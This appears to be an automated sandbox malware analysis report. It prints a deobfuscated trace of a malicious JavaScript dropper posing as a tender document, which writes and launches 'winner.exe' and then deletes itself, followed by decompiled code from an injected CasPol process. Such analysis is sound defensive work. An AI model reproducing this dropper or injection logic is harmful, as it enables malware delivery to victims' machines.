    • _0x10bd(200,undefined) ➔ "rmkoj8oa"
    • _0x10bd(161,undefined) ➔ "cz*B"
    • _0x10bd(202,undefined) ➔ "3o8g"
    • _0x10bd(200,undefined) ➔ "Open"
    • _0x10bd(161,undefined) ➔ "W5ZdI13cMmk4B2fiW4xdTW"
    • _0x10bd(166,undefined) ➔ "35751wCkNjf"
    • _0x10bd(192,undefined) ➔ "172CBHuQO"
    • _0x10bd(215,undefined) ➔ "W4eBm1u"
      _0x10bd08 = _0x10bd08 - 0x99;
      var _0x347c9 = _0x33f15e[_0x10bd08];
      return _0x347c9;
    }, _0x10bd ( _0x11a177, _0x26656a );
}
Stream[_0x406710 ( 0x1e9, 'Lnop' ) ] ( ), Stream[_0x1f863f ( 0x1ea ) ] = 0x1, Stream[_0x406710 ( 0x1fe, _0x25fd55 ( 0xbe, 'xB*!' ) ) ] ( Object[_0x406710 ( 0x1eb, '55^f' ) ] ), Stream[_0x406710 ( 0x202, _0xfacb16 ( 0xc9 ) ) ] = 0x0, Stream[_0x1f863f ( 0x1e8 ) ] ( pOut, 0x2 ), Stream[_0x1f863f ( 0x1f6 ) ] ( ), new ActiveXObject ( _0x1f863f ( 0x1fa ) ) [_0x406710 ( 0x208, _0x25fd55 ( 0xb8, 'o5HG' ) ) ] ( pOut, '', '', _0x406710 ( 0x1fc, 'Rtbv' ), '1' ), new ActiveXObject ( _0x1f863f ( 0x204 ) ) [_0x1f863f ( 0x1f1 ) ] ( WScript[_0x25fd55 ( 0xb1, 'LA#Q' ) ] );
• _0x406710(489,"Lnop") ➔ "Open"
• Open() ➔ undefined
• _0x1f863f(490) ➔ "Type"
• _0x25fd55(190,"xB*!") ➔ "n@H!"
• _0x406710(510,"n@H!") ➔ "Write"
• _0x406710(491,"55^f") ➔ "ResponseBody"
                                                                                                                                                                                                                                                                                                                          • Write() ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0xfacb16(201) ➔ "&DC)"
                                                                                                                                                                                                                                                                                                                          • _0x406710(514,"&DC)") ➔ "Position"
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(488) ➔ "SaveToFile"
                                                                                                                                                                                                                                                                                                                          • SaveToFile("C:\Users\alfons\AppData\Local\Temp\winner.exe",2) ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(502) ➔ "Close"
                                                                                                                                                                                                                                                                                                                          • Close() ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(506) ➔ "Shell.Application"
                                                                                                                                                                                                                                                                                                                          • _0x25fd55(184,"o5HG") ➔ "#zNv"
                                                                                                                                                                                                                                                                                                                          • _0x406710(520,"#zNv") ➔ "ShellExecute"
                                                                                                                                                                                                                                                                                                                          • _0x406710(508,"Rtbv") ➔ "open"
                                                                                                                                                                                                                                                                                                                          • ShellExecute("C:\Users\alfons\AppData\Local\Temp\winner.exe","","","open","1") ➔ undefined
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(516) ➔ "Scripting.FileSystemObject"
                                                                                                                                                                                                                                                                                                                          • _0x1f863f(497) ➔ "DeleteFile"
                                                                                                                                                                                                                                                                                                                          • _0x25fd55(177,"LA#Q") ➔ "ScriptFullName"
                                                                                                                                                                                                                                                                                                                          • DeleteFile("C:\Users\alfons\Desktop\0900664 MOHS Tender..js") ➔ undefined

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:7.5%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:4%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:5.6%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:780
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:82

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 106 40cf63-40cf7f 107 40cf87-40cf8c 106->107 108 40cf82 call 420eb3 106->108 109 40cf92-40cfa0 call 4213d3 107->109 110 40cf8e-40cf91 107->110 108->107 113 40cfb0-40cfc1 call 41f753 109->113 114 40cfa2-40cfad call 421653 109->114 119 40cfc3-40cfd7 LdrLoadDll 113->119 120 40cfda-40cfdd 113->120 114->113 119->120
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0040CF63(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                                                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                                                                                                                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                                                                                                                                                                            				char _v536;
                                                                                                                                                                                                                                                                                                                            				void* _t15;
                                                                                                                                                                                                                                                                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                                                                                                                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_v8 =  &_v536;
                                                                                                                                                                                                                                                                                                                            				_t15 = E00420EB3( &_v12, 0x104, _a8);
                                                                                                                                                                                                                                                                                                                            				_t31 = _t30 + 0xc;
                                                                                                                                                                                                                                                                                                                            				if(_t15 != 0) {
                                                                                                                                                                                                                                                                                                                            					_t17 = E004213D3(__eflags, _v8);
                                                                                                                                                                                                                                                                                                                            					_t32 = _t31 + 4;
                                                                                                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                                                                                                            						E00421653( &_v12, 0);
                                                                                                                                                                                                                                                                                                                            						_t32 = _t32 + 8;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            					_t18 = E0041F753(_v8);
                                                                                                                                                                                                                                                                                                                            					_v16 = _t18;
                                                                                                                                                                                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                                                                                                                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                                                                                                                                                                            						return _v16;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            					return _t18;
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					return _t15;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFD5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9ce3e21bcb2f0c99f266a038cf30227417afd4a146aa06ba6ae79da7fdaa82e0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65a26e238b0fc3214e5a8eb06d637f1bd91da8b934cc4b39fee1a4b98f2cb353
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A70152B1E0020EBBDF10DBE1DC82F9EB3799B14308F0081A6E908A7280F634EB448755
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 121 41e573-41e5c4 call 41f1e3 NtCreateFile
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E573(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t3 = _a4 + 0xa6c; // 0xa6c
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                                                                                                                                                                                                                                                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5C0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 124 41e623-41e66c call 41f1e3 NtReadFile
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtReadFile.NTDLL(004194D3,004149A3,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,004149A3,004194D3,00000002,00000000), ref: 0041E668
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 127 41e753-41e790 call 41f1e3 NtAllocateVirtualMemory
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E753(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                                                                                                                                                            				long _t14;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t10 = _a4;
                                                                                                                                                                                                                                                                                                                            				_t2 = _t10 + 0x14; // 0x6ad04d03
                                                                                                                                                                                                                                                                                                                            				_t3 = _t10 + 0xa8c; // 0x404043
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *_t2, _a4, _t3,  *_t2, 0, 0x30);
                                                                                                                                                                                                                                                                                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035B7,00000004,00001000,00000000), ref: 0041E78C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2167126740-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 144 41e6a3-41e6cc call 41f1e3 NtClose
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E6A3(intOrPtr _a4, void* _a8) {
                                                                                                                                                                                                                                                                                                                            				long _t8;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				E0041F1E3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                                                                                                                                                                                                                                                                                            				_t8 = NtClose(_a8); // executed
                                                                                                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                                                                            0x0041e6ba
                                                                                                                                                                                                                                                                                                                            0x0041e6c8
                                                                                                                                                                                                                                                                                                                            0x0041e6cc

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6C8
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Close
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 154 1269540-126954c LdrInitializeThunk
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 155 12695d0-12695dc LdrInitializeThunk
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449784207.0000000001200000.00000040.00001000.00020000.00000000.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_1200000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                                                                                                                                                                                                                                                                                                            • Instruction ID: aa0183c6a2eacb5a223d2e3d3946e6a54cbeb8b168b933dbd567b12e7e8f7c12
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 649002A121200403510571A94414617400AABE0241B51C025E1005590DC57588917265
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                                                            			E004098E3(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                                                                            				char _v67;
                                                                                                                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				_t32 = __eflags;
                                                                                                                                                                                                                                                                                                                            				_v68 = 0;
                                                                                                                                                                                                                                                                                                                            				E004201B3( &_v67, 0, 0x3f);
                                                                                                                                                                                                                                                                                                                            				E00420C63( &_v68, 3);
                                                                                                                                                                                                                                                                                                                            				_t19 = _a4;
                                                                                                                                                                                                                                                                                                                            				_t13 = E0040CF63(_t32, _a4 + 0x20,  &_v68); // executed
                                                                                                                                                                                                                                                                                                                            				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E53(0x90cb65ce));
                                                                                                                                                                                                                                                                                                                            				_t27 = _t15;
                                                                                                                                                                                                                                                                                                                            				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                                                            					_t25 = _a8;
                                                                                                                                                                                                                                                                                                                            					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                                                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                                                                                                            						return  *_t27(_t25, 0x8003, _t28 + (E0040C633(1, 8, _t19 + 0x76c) & 0x000000ff) - 0x40, _t15);
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				return _t15;
                                                                                                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostThreadMessageW.USER32(0000CC46,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409946
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2515ffc4a8433256958309c25ddaf1653671ec11ea0cbc47fcd5b21ad2bb6768
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2d8687f109e0ffa181acc9ca0b32257cecb9af4e939f6e85864966571f5bb18d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2515ffc4a8433256958309c25ddaf1653671ec11ea0cbc47fcd5b21ad2bb6768
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C019B71A4021476E7216691DC82FFF776C9B44F54F14012DFF057A2C2D6ACAD0647E9
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 135 41e843-41e874 call 41f1e3 RtlAllocateHeap
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                                            			E0041E843(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                                                                                                            
